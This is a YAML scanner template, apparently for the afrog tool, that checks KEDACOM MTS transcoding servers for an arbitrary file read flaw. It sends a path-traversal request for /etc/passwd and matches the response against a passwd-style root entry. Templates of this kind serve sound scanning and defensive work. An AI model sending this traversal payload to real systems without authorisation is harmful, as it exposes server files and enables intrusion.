id: kedacom-mts-file-read

info:
  name: 科达 MTS转码服务器 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |
    KEDACOM MTS转码服务器存在任意文件读取漏洞，攻击这通过漏洞可以读取服务器任意信息
    app="MTS转码服务器"
  reference:
    - http://wiki.peiqi.tech/wiki/webapp/%E7%A7%91%E8%BE%BE/%E7%A7%91%E8%BE%BE%20MTS%E8%BD%AC%E7%A0%81%E6%9C%8D%E5%8A%A1%E5%99%A8%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
